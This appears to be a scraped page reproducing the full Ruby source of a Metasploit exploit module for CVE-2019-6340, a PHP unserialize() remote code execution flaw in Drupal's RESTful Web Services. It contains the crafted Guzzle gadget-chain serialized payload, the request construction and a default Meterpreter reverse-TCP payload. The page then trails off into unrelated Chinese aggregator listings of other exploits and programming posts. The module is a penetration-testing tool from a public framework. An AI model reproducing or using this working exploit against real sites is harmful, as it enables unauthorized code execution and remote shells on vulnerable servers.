##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
## class MetasploitModule < Msf::Exploit::Remote # NOTE: All (four) Web Services modules need to be enabled
Rank = NormalRanking include Msf::Exploit::Remote::HTTP::Drupal def initialize(info = {})
super(update_info(info,
'Name' => 'Drupal RESTful Web Services unserialize() RCE',
'Description' => %q{
This module exploits a PHP unserialize() vulnerability in Drupal RESTful
Web Services by sending a crafted request to the /node REST endpoint. As per SA-CORE-2019-003, the initial remediation was to disable POST,
PATCH, and PUT, but Ambionics discovered that GET was also vulnerable
(albeit cached). Cached nodes can be exploited only once. Drupal updated SA-CORE-2019-003 with PSA-2019-02-22 to notify users of
this alternate vector. Drupal < 8.5.11 and < 8.6.10 are vulnerable.
},
'Author' => [
'Jasper Mattsson', # Discovery
'Charles Fol', # PoC
'Rotem Reiss', # Module
'wvu' # Module
],
'References' => [
['CVE', '2019-6340'],
['URL', 'https://www.drupal.org/sa-core-2019-003'],
['URL', 'https://www.drupal.org/psa-2019-02-22'],
['URL', 'https://www.ambionics.io/blog/drupal8-rce'],
['URL', 'https://github.com/ambionics/phpggc'],
['URL', 'https://twitter.com/jcran/status/1099206271901798400']
],
'DisclosureDate' => '2019-02-20',
'License' => MSF_LICENSE,
'Platform' => ['php', 'unix'],
'Arch' => [ARCH_PHP, ARCH_CMD],
'Privileged' => false,
'Targets' => [
['PHP In-Memory',
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Type' => :php_memory,
'Payload' => {'BadChars' => "'"},
'DefaultOptions' => {
'PAYLOAD' => 'php/meterpreter/reverse_tcp'
}
],
['Unix In-Memory',
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Type' => :unix_memory,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/unix/generic',
'CMD' => 'id'
}
]
],
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [CRASH_SAFE],
'SideEffects' => [IOC_IN_LOGS],
'Reliablity' => [UNRELIABLE_SESSION], # When using the GET method
'AKA' => ['SA-CORE-2019-003']
}
)) register_options([
OptEnum.new('METHOD', [true, 'HTTP method to use', 'POST',
['GET', 'POST', 'PATCH', 'PUT']]),
OptInt.new('NODE', [false, 'Node ID to target with GET method', 1])
]) register_advanced_options([
OptBool.new('ForceExploit', [false, 'Override check result', false])
])
end def check
checkcode = CheckCode::Unknown version = drupal_version unless version
vprint_error('Could not determine Drupal version')
return checkcode
end if version.to_s !~ /^8\b/
vprint_error("Drupal #{version} is not supported")
return CheckCode::Safe
end vprint_status("Drupal #{version} targeted at #{full_uri}")
checkcode = CheckCode::Detected changelog = drupal_changelog(version) unless changelog
vprint_error('Could not determine Drupal patch level')
return checkcode
end case drupal_patch(changelog, 'SA-CORE-2019-003')
when nil
vprint_warning('CHANGELOG.txt no longer contains patch level')
when true
vprint_warning('Drupal appears patched in CHANGELOG.txt')
checkcode = CheckCode::Safe
when false
vprint_good('Drupal appears unpatched in CHANGELOG.txt')
checkcode = CheckCode::Appears
end # Any further with GET and we risk caching the targeted node
return checkcode if meth == 'GET' # NOTE: Exploiting the vuln will move us from "Safe" to Vulnerable
token = Rex::Text.rand_text_alphanumeric(8..42)
res = execute_command("echo #{token}") return checkcode unless res if res.body.include?(token)
vprint_good('Drupal is vulnerable to code execution')
checkcode = CheckCode::Vulnerable
end checkcode
end def exploit
if [CheckCode::Safe, CheckCode::Unknown].include?(check)
if datastore['ForceExploit']
print_warning('ForceExploit set! Exploiting anyway!')
else
fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')
end
end if datastore['PAYLOAD'] == 'cmd/unix/generic'
print_warning('Enabling DUMP_OUTPUT for cmd/unix/generic')
# XXX: Naughty datastore modification
datastore['DUMP_OUTPUT'] = true
end case target['Type']
when :php_memory
# XXX: This will spawn a *very* obvious process
execute_command("php -r '#{payload.encoded}'")
when :unix_memory
execute_command(payload.encoded)
end
end def execute_command(cmd, opts = {})
vprint_status("Executing with system(): #{cmd}") # https://en.wikipedia.org/wiki/Hypertext_Application_Language
hal_json = JSON.pretty_generate(
'link' => [
'value' => 'link',
'options' => phpggc_payload(cmd)
],
'_links' => {
'type' => {
'href' => vhost_uri
}
}
) print_status("Sending #{meth} to #{node_uri} with link #{vhost_uri}") res = send_request_cgi({
'method' => meth,
'uri' => node_uri,
'ctype' => 'application/hal+json',
'vars_get' => {'_format' => 'hal_json'},
'data' => hal_json
}, 3.5) return unless res case res.code
# 401 isn't actually a failure when using the POST method
when 200, 401
print_line(res.body) if datastore['DUMP_OUTPUT']
if meth == 'GET'
print_warning('If you did not get code execution, try a new node ID')
end
when 404
print_error("#{node_uri} not found")
when 405
print_error("#{meth} method not allowed")
when 422
print_error('VHOST may need to be set')
when 406
print_error('Web Services may not be enabled')
else
print_error("Unexpected reply: #{res.inspect}")
end res
end # phpggc Guzzle/RCE1 system id
def phpggc_payload(cmd)
(
# http://www.phpinternalsbook.com/classes_objects/serialization.html
<<~EOF
O:24:"GuzzleHttp\\Psr7\\FnStream":2:{
s:33:"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods";a:1:{
s:5:"close";a:2:{
i:0;O:23:"GuzzleHttp\\HandlerStack":3:{
s:32:"\u0000GuzzleHttp\\HandlerStack\u0000handler";
s:cmd_len:"cmd";
s:30:"\u0000GuzzleHttp\\HandlerStack\u0000stack";
a:1:{i:0;a:1:{i:0;s:6:"system";}}
s:31:"\u0000GuzzleHttp\\HandlerStack\u0000cached";
b:0;
}
i:1;s:7:"resolve";
}
}
s:9:"_fn_close";a:2:{
i:0;r:4;
i:1;s:7:"resolve";
}
}
EOF
).gsub(/\s+/, '').gsub('cmd_len', cmd.length.to_s).gsub('cmd', cmd)
end def meth
datastore['METHOD'] || 'POST'
end def node
datastore['NODE'] || 1
end def node_uri
if meth == 'GET'
normalize_uri(target_uri.path, '/node', node)
else
normalize_uri(target_uri.path, '/node')
end
end def vhost_uri
full_uri(
normalize_uri(target_uri.path, '/rest/type/shortcut/default'),
vhost_uri: true
)
end end

[EXP]Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)的更多相关文章

  1. [EXP]Jenkins 2.150.2 - Remote Command Execution (Metasploit)

    ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://gith ...

  2. [EXP]Apache Spark - Unauthenticated Command Execution (Metasploit)

    ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://gith ...

  3. WebStorm 11、PhpStorm 10免费激活(不需要注册码)

    之前分享的WebStorm9.WebStrom10.PhpStorm9注册码生成网站已经被站长关了,比较遗憾!http://my.oschina.net/ximidao/blog/486353 现在官 ...

  4. 下面程序的输出结果是____ A:11,10 B:11,11 C:10,10 D:10,11 int x=10; int y=x++; printf("%d,%d",(x++,y),y++);

    下面程序的输出结果是____ A:11,10 B:11,11 C:10,10 D:10,11 int x=10; int y=x++; printf("%d,%d",(x++,y) ...

  5. ssh The authenticity of host '10.11.26.2 (10.11.26.2)' can't be established

    The authenticity of host '10.11.26.2 (10.11.26.2)' can't be established. ECDSA key fingerprint is SH ...

  6. jenkins git can't work ERROR: Timeout after 10 minutes ERROR: Error fetching remote repo 'origin'

    Started by user Allen Running as Allen Building remotely on MISTestSrv2 (MIS) in workspace C:\jenkin ...

  7. 10 Future Web Trends 十大未来互联网趋势

    转载自:http://blog.sina.com.cn/s/blog_4be577310100ajpb.html 我们很满意自己进入的当前网络纪元,通常被称为Web 2.0.这个阶段互联网的特征包括搜 ...

  8. CXF(2.7.10) - RESTful Services, JSON Support

    在 CXF(2.7.10) - RESTful Services 介绍了 REST 风格的 WebService 服务,数据传输是基于 XML 格式的.如果要基于 JSON 格式传输数据,仅需要将注解 ...

  9. [EXP]Microsoft Windows MSHTML Engine - "Edit" Remote Code Execution

    # Exploit Title: Microsoft Windows (CVE-2019-0541) MSHTML Engine "Edit" Remote Code Execut ...

随机推荐

  1. Selenium Webdriver元素定位的八种常用方式(转载)

    转载自 https://www.cnblogs.com/qingchunjun/p/4208159.html 在使用selenium webdriver进行元素定位时,通常使用findElement或 ...

  2. c++ 中的数字和字符串的转换

    理由:一直忘记数字型的字符串和数字之间的转换,这次总结一下,以便后面再次用到. 其实 C++ 已经给我们写好了相应的函数,直接拿来用即可 QA1:如何把一个数字转换为一个数字字符串?(这个不是很常用) ...

  3. 丑数(python)

    题目描述 把只包含质因子2.3和5的数称作丑数(Ugly Number).例如6.8都是丑数,但14不是,因为它包含质因子7. 习惯上我们把1当做是第一个丑数.求按从小到大的顺序的第N个丑数.   # ...

  4. 384. Shuffle an Array数组洗牌

    [抄题]: Shuffle a set of numbers without duplicates. Example: // Init an array with set 1, 2, and 3. i ...

  5. [leetcode]13. Roman to Integer罗马数字转整数

    Roman numerals are represented by seven different symbols: I, V, X, L, C, D and M. Symbol Value I 1 ...

  6. Java线程池的构造以及使用

    有时候,系统需要处理非常多的执行时间很短的请求,如果每一个请求都开启一个新线程的话,系统就要不断的进行线程的创建和销毁,有时花在创建和销毁线程上的时间会比线程真正执行的时间还长.而且当线程数量太多时, ...

  7. Retrofit 2.0基于OKHttp更高效更快的网络框架 以及自定义转换器

    时间关系,本文就 Retrofit 2.0的简单使用 做讲解  至于原理以后有空再去分析 项目全面.简单.易懂  地址: 关于Retrofit 2.0的简单使用如下:  https://gitee.c ...

  8. iOS 拨打电话三种方式

    ,这种方法,拨打完电话回不到原来的应用,会停留在通讯录里,而且是直接拨打,不弹出提示 NSMutableString * str=[[NSMutableString alloc] initWithFo ...

  9. centos 安装解压工作

    解压工具: yum install ark 编辑器: yum install gedit

  10. boost学习 内嵌类型检测 与 any 的代码练习

    本文是学习 boost源码的一些练习 参考文章来自 刘未鹏 C++的罗浮宫(http://blog.csdn.net/pongba) 目录 http://blog.csdn.net/pongba/ar ...